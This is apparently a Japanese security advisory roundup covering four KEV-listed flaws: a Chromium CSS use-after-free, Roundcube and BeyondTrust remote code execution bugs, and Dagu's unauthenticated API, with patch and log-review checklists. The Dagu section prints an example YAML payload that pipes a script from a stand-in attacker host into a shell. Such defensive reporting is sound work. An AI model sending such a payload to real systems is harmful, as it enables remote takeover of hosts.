CISA KEV追加の重大脆弱性4件:Chromiumゼロデイからデフォルト認証なしRCEまで
同じ週にCISA KEVカタログへ重大脆弱性が立て続けに追加された。ブラウザ、Webメール、特権アクセス管理ツール、ワークフローエンジン——対象は異なるが、すべて悪用が確認済みまたはPoCが公開済みで、即時対応が必要な案件だ。
Chromium CVE-2026-2441:CSSエンジンのUAFゼロデイ
概要
CVE-2026-2441はChromiumのCSSエンジンに存在するuse-after-free(UAF)脆弱性だ。CISAがKEVカタログに追加済みで、悪用コードが既に流通している。
UAFはヒープメモリ内で解放済みの領域を再度参照するバグで、攻撃者はユーザーの権限で任意のコードを実行できる。悪意あるHTMLページを開くだけで攻撃が成立する。
影響を受けるブラウザ
| ブラウザ | 対応バージョン |
|---|---|
| Google Chrome | 145.0.7632.75/76(Windows/macOS)、144.0.7559.75(Linux) |
| Microsoft Edge | パッチリリース済み |
| Brave | パッチリリース済み |
| Opera | パッチリリース済み |
SafariはWebKit、FirefoxはGeckoを使用しており影響を受けない。
対応
Chromeはchrome://settings/help、Edgeはedge://settings/helpでバージョンを確認する。企業環境では管理対象デバイスへのパッチ配布を最高優先度に設定すること。
ChromiumのレンダリングエンジンBlinkはCSSの複雑な処理をC++で実装しており、カスケード・継承・アニメーションなど動的な状態変化によってオブジェクトのライフタイム管理が複雑になりやすい。CSSエンジンのUAFは過去にも複数のCVEが報告されており、JavaScriptエンジンと並ぶ主要な攻撃面だ。
CISAのKEV追加は「野外での実際の悪用が確認された」ことを意味する。放置すればやられる。
Roundcube CVE-2025-49113:10年以上潜伏していたCVSS 9.9のRCE
概要
| 項目 | 内容 |
|---|---|
| CVE番号 | CVE-2025-49113 |
| CVSSスコア | 9.9(Critical) |
| 脆弱性の種類 | 信頼されないデータのデシリアライゼーション |
| 悪用状況 | 野外での積極的な悪用確認済み |
program/actions/settings/upload.phpの_fromパラメータが適切に検証されておらず、認証済みユーザーがサーバー上で任意のコードを実行できる。
パッチ公開後48時間で武器化
ドバイのセキュリティ企業FearsOffが報告し、2025年6月にパッチが適用された。しかしパッチ公開後48時間以内に攻撃者がエクスプロイトを武器化した。さらに、コードベースに10年以上存在していたことが判明している。48時間で武器化されている以上、パッチ適用の猶予はほぼない。
あわせてCVE-2025-68461(CVSS 7.2、SVGアニメートタグによるXSS)も同日KEVに追加された。2025年12月にパッチ提供済み。
なぜRoundcubeが狙われるか
Roundcubeはオープンソースのwebメールクライアントで、特に欧州の政府機関・外交機関に広く採用されている。過去にAPT28(Fancy Bear/GRU関連)やWinter Vivernが欧州政府機関やシンクタンクを狙うキャンペーンで標的にしてきた。今回KEVに追加された件は攻撃者が特定されていないが、過去の標的化パターンと一致する。
対応チェックリスト
- 使用中のRoundcubeバージョンを確認
- CVE-2025-49113: 2025年6月リリースのパッチを適用
- CVE-2025-68461: 2025年12月リリースのパッチを適用
- 認証ログの不審なアップロード操作をチェック
- 最新安定版へのアップグレードを優先
CISA KEV追加により、連邦民間行政機関(FCEB)は2026年3月13日までの対応が義務付けられた。
一次情報: CISA KEVカタログ
BeyondTrust CVE-2026-1731:ランサムウェアキャンペーンで悪用中のCVSS 9.9
概要
| 項目 | 内容 |
|---|---|
| CVE番号 | CVE-2026-1731 |
| CVSSスコア | 9.9(Critical) |
| 影響製品 | BeyondTrust Remote Support(RS)、Privileged Remote Access(PRA) |
| 攻撃経路 | WebSocketインターフェース |
| CISAカタログ | KEV登録済み(ランサムウェア悪用確認) |
WebSocketインターフェース経由でthin-scc-wrapperスクリプトを通じて任意のシェルコマンドをインジェクション・実行できる。Palo Alto Networks Unit 42によれば、このアカウントを掌握すればアプライアンスの設定・管理セッション・ネットワークトラフィックを丸ごと制御できる。
観察された攻撃チェーン
Unit 42が確認した多層的な攻撃手口:
- カスタムPythonスクリプトで管理者アカウントへのアクセスを取得
- ディスク書き込みなしのPHPバックドアを設置(ディスクスキャンでの検出が困難)
- Bashドロッパーで持続的Webシェルを確立、VShell・Spark RATをインストール
- 設定ファイル・PostgreSQLダンプを圧縮して外部送信
標的セクターは金融、法律、テクノロジー、高等教育、卸売・小売、医療。地域は米国、フランス、ドイツ、オーストラリア、カナダ。BeyondTrustはPAM(特権アクセス管理)の中心的製品であり、侵害された場合の横展開の影響は組織全体に及ぶ。
繰り返す同一製品の脆弱性
BeyondTrustには以前にもCVE-2024-12356が存在し、中国系脅威アクター「Silk Typhoon」による悪用が記録されている。Unit 42は「異なるコード実行経路において入力検証の問題が繰り返し発生している」と指摘している。同じ製品で同じ種類のバグが繰り返されるのは設計の問題だ。
対応手順
- BeyondTrustの最新パッチを速やかに適用
- WebSocketアクセスログと
thin-scc-wrapperの実行履歴を確認 - PostgreSQLダンプ操作の痕跡を確認
- 不審なPHPファイル・Bashスクリプト、VShell・Spark RATの通信を確認
- 不正追加・変更された管理者アカウントがないか監査
- CVE-2024-12356の対応状況もあわせて検証
元記事: BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration
Dagu GHSA-6QR9-G2XW-CW92:デフォルト認証なしでAPIからRCE(CVSS 9.8)
概要
GoベースのワークフローエンジンDaguにCVSS 9.8の脆弱性が見つかった。デフォルト設定ではAPIエンドポイントに認証が存在せず、外部から任意のシェルコマンドを実行できる。PoCが公開済み。
DaguはGoで書かれた軽量ワークフローエンジンで、cronの代替としてCI/CDパイプラインやデータパイプラインで使われている。
攻撃の仕組み
デフォルト設定では/api/v1/dagsエンドポイントが認証なしで外部に公開される。このエンドポイントはDAG定義(YAMLファイル)を受け取って実行する機能を持つ。攻撃者は以下のようなHTTP POSTを送るだけでホスト上の任意のコマンドを実行できる。
steps:
- name: malicious-step
command: /bin/sh
args:
- -c
- "curl attacker.com/shell.sh | sh"認証機能自体は存在するが、有効化には明示的な設定が必要で、デフォルトでは無効。CWE-306「認証メカニズムの欠落」に該当する。
| 要素 | 評価 |
|---|---|
| 攻撃ベクトル | ネットワーク経由(ローカルアクセス不要) |
| 攻撃の複雑性 | 低い |
| 必要な認証 | なし |
| 影響範囲 | 機密性・完全性・可用性すべてに高い影響 |
対応手順
修正済みバージョンへのアップデートが最優先。修正内容はauthMiddlewareの追加で、APIエンドポイントへの認証チェックが挿入された。アップデート後、APIアクセスが401 Unauthorizedを返せば対応済みだ。
暫定対応として設定ファイルで認証を有効化できる。
# config.yaml
auth:
mode: builtin
basic:
username: your_username
password: your_password加えて、DaguのAPIポート(デフォルト8080)をファイアウォールで制限し、Daguを非特権ユーザーで実行して被害範囲を限定する。Kubernetesクラスタや共有開発環境で動作しているDaguは、横移動(ラテラルムーブメント)の足がかりになりうる。